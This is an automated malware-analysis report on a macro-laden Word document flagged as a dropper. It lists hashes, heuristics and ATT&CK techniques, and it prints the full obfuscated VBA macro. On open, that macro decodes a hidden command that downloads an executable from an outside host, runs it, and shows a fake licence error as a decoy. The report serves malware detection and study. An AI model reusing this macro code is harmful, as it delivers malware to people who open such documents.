Office (OLE) malware analysis — malicious · fb8575b65fc95a2d

MALICIOUS

Office (OLE)

117.5 KB Created: 2017-05-09 08:23:00 First seen: 2018-07-04

MD5: 5da1d43f231c96d82d974db4473f6cac SHA-1: eb42a0ebf85ddd98e8c101f4aec5c651a0787f19 SHA-256: fb8575b65fc95a2dd58ad5ff9f4e7c60fdcb77badb3616f84b2228da0f8189e0

190 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains a VBA macro with an AutoOpen subroutine that uses the Shell() function to execute a command. The document body explicitly instructs the user to "Enable editing" and "Enable Content", a common lure for macro-based malware. The obfuscated script likely downloads and executes a second-stage payload, as indicated by the Shell() call and the ClamAV detection name 'Doc.Dropper.Agent'.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6477314-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6477314-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Matched line in script
```
Shell Jbpaven, vbHide
MsgBox Gkkaxnwwlyredlaks
```

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Jbpaven = Jbpaven & Wawczspesfvoswaigne("fpg1h{h 2f %zdlwiru ") & Wawczspesfvoswaigne("2w 8 \NHUT ) elwvdgp") & Wawczspesfvoswaigne("lq 2wudq") & Wawczspesfvoswaigne("vihu ") & Wawczspesfvoswaigne("XNH") & Wawczspesfvoswaigne("I 2grzqordg 2sul") & Wawczspesfvoswaigne("rulw| qrupdo kw") & Wawczspesfvoswaigne("wsv=22zzz1zwuompsj")

Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2689 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2689 bytes
SHA-256: `2d5e2e475d5b13cc8a5ff3e005f58137e2642802f8cf6f587a005996368a2311`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Sub AutoOpen() Jbpaven = Jbpaven & Wawczspesfvoswaigne("fpg1h{h 2f %zdlwiru ") & Wawczspesfvoswaigne("2w 8 \NHUT ) elwvdgp") & Wawczspesfvoswaigne("lq 2wudq") & Wawczspesfvoswaigne("vihu ") & Wawczspesfvoswaigne("XNH") & Wawczspesfvoswaigne("I 2grzqordg 2sul") & Wawczspesfvoswaigne("rulw\| qrupdo kw") & Wawczspesfvoswaigne("wsv=22zzz1zwuompsj") Jbpaven = Jbpaven & Wawczspesfvoswaigne("6j}oj1elg2Ordghu1h{h (") & Wawczspesfvoswaigne("dssgd") & Wawczspesfvoswaigne("wd(_ypef\|m1h{h )vwdu") & Wawczspesfvoswaigne("w (dssgdwd(_ypef\|m1h{h%") Gkkaxnwwlyredlaks = Gkkaxnwwlyredlaks & Wawczspesfvoswaigne("Huur") & Wawczspesfvoswaigne("u 4<;:7= \rx pxvw kdyh Riil") & Wawczspesfvoswaigne("fh Surihvvlrqdo Hglwlrq wr u") & Wawczspesfvoswaigne("hdg wklv") & Wawczspesfvoswaigne(" frqw") & Wawczspesfvoswaigne("hqw/ sohdvh xsjudgh \|rxu") Gkkaxnwwlyredlaks = Gkkaxnwwlyredlaks & Wawczspesfvoswaigne(" olfhqfh1 Yl") & Wawczspesfvoswaigne("vlw ") & Wawczspesfvoswaigne("zzz1plfurvriw1frp iru khos") Shell Jbpaven, vbHide MsgBox Gkkaxnwwlyredlaks If 727 * 6 = 17036 - 3395 Then tddhtex = "eugbj" End If End Sub Private Function Rhphlnjibgbxcljzd(ByVal Gpnamnf As String, ByVal Mtafulesi As Long) As String Dim Ovifmhfsnzykltbrds, Lrsfhksgaaek, Baouxkhbylupdrtsagkfosm As Long If Len("fyaxaca") <> 630 Then ' dnrbhhoz Else ' tyudk MsgBox "avklwlv", 24, "sgzbxpee" End If Ovifmhfsnzykltbrds = Len(Gpnamnf) Dim Bljuajbxboklsawhuhyb As String Dim Defmvhhjazarcxx() As Long ReDim Defmvhhjazarcxx(1 To Ovifmhfsnzykltbrds) For Baouxkhbylupdrtsagkfosm = 1 To Ovifmhfsnzykltbrds Lrsfhksgaaek = Asc(Mid(Gpnamnf, Baouxkhbylupdrtsagkfosm, 1)) If Lrsfhksgaaek = 32 Then Defmvhhjazarcxx(Baouxkhbylupdrtsagkfosm) = Lrsfhksgaaek Else: Lrsfhksgaaek = Lrsfhksgaaek - Mtafulesi If 70 * 6 = 24790 - 3979 Then lngxuox = "koutnoa" End If Defmvhhjazarcxx(Baouxkhbylupdrtsagkfosm) = Lrsfhksgaaek End If If Len("nlpec") <> 442 Then ' hnrzymeg Else ' fztsl MsgBox "xnickf", 574, "mzrwjhv" End If Bljuajbxboklsawhuhyb = Bljuajbxboklsawhuhyb & Chr(Defmvhhjazarcxx(Baouxkhbylupdrtsagkfosm)) Next Rhphlnjibgbxcljzd = Bljuajbxboklsawhuhyb End Function Private Function Wawczspesfvoswaigne(Mtwf As String) If Len("wioohj") <> 819 Then ' kvdkyz Else ' zjtpkh MsgBox "otcwo", 581, "dktkn" End If Wawczspesfvoswaigne = Rhphlnjibgbxcljzd(Mtwf, 3) End Function

SHA-256: 2d5e2e475d5b13cc8a5ff3e005f58137e2642802f8cf6f587a005996368a2311

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Jbpaven = Jbpaven & Wawczspesfvoswaigne("fpg1h{h 2f %zdlwiru ") & Wawczspesfvoswaigne("2w 8 \NHUT ) elwvdgp") & Wawczspesfvoswaigne("lq 2wudq") & Wawczspesfvoswaigne("vihu ") & Wawczspesfvoswaigne("XNH") & Wawczspesfvoswaigne("I 2grzqordg 2sul") & Wawczspesfvoswaigne("rulw| qrupdo kw") & Wawczspesfvoswaigne("wsv=22zzz1zwuompsj")
Jbpaven = Jbpaven & Wawczspesfvoswaigne("6j}oj1elg2Ordghu1h{h (") & Wawczspesfvoswaigne("dssgd") & Wawczspesfvoswaigne("wd(_ypef|m1h{h )vwdu") & Wawczspesfvoswaigne("w (dssgdwd(_ypef|m1h{h%")
Gkkaxnwwlyredlaks = Gkkaxnwwlyredlaks & Wawczspesfvoswaigne("Huur") & Wawczspesfvoswaigne("u 4<;:7= \rx pxvw kdyh Riil") & Wawczspesfvoswaigne("fh Surihvvlrqdo Hglwlrq wr u") & Wawczspesfvoswaigne("hdg wklv") & Wawczspesfvoswaigne(" frqw") & Wawczspesfvoswaigne("hqw/ sohdvh xsjudgh |rxu")
Gkkaxnwwlyredlaks = Gkkaxnwwlyredlaks & Wawczspesfvoswaigne(" olfhqfh1 Yl") & Wawczspesfvoswaigne("vlw ") & Wawczspesfvoswaigne("zzz1plfurvriw1frp iru khos")
    
Shell Jbpaven, vbHide
MsgBox Gkkaxnwwlyredlaks
If 727 * 6 = 17036 - 3395 Then
tddhtex = "eugbj"
End If
End Sub
Private Function Rhphlnjibgbxcljzd(ByVal Gpnamnf As String, ByVal Mtafulesi As Long) As String
Dim Ovifmhfsnzykltbrds, Lrsfhksgaaek, Baouxkhbylupdrtsagkfosm As Long
If Len("fyaxaca") <> 630 Then
' dnrbhhoz
Else
' tyudk
MsgBox "avklwlv", 24, "sgzbxpee"
End If
Ovifmhfsnzykltbrds = Len(Gpnamnf)
Dim Bljuajbxboklsawhuhyb As String
Dim Defmvhhjazarcxx() As Long
ReDim Defmvhhjazarcxx(1 To Ovifmhfsnzykltbrds)
For Baouxkhbylupdrtsagkfosm = 1 To Ovifmhfsnzykltbrds
Lrsfhksgaaek = Asc(Mid(Gpnamnf, Baouxkhbylupdrtsagkfosm, 1))
If Lrsfhksgaaek = 32 Then
Defmvhhjazarcxx(Baouxkhbylupdrtsagkfosm) = Lrsfhksgaaek
Else:
Lrsfhksgaaek = Lrsfhksgaaek - Mtafulesi
If 70 * 6 = 24790 - 3979 Then
lngxuox = "koutnoa"
End If
Defmvhhjazarcxx(Baouxkhbylupdrtsagkfosm) = Lrsfhksgaaek
End If
If Len("nlpec") <> 442 Then
' hnrzymeg
Else
' fztsl
MsgBox "xnickf", 574, "mzrwjhv"
End If
Bljuajbxboklsawhuhyb = Bljuajbxboklsawhuhyb & Chr(Defmvhhjazarcxx(Baouxkhbylupdrtsagkfosm))
Next
Rhphlnjibgbxcljzd = Bljuajbxboklsawhuhyb
End Function
Private Function Wawczspesfvoswaigne(Mtwf As String)
If Len("wioohj") <> 819 Then
' kvdkyz
Else
' zjtpkh
MsgBox "otcwo", 581, "dktkn"
End If
Wawczspesfvoswaigne = Rhphlnjibgbxcljzd(Mtwf, 3)
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.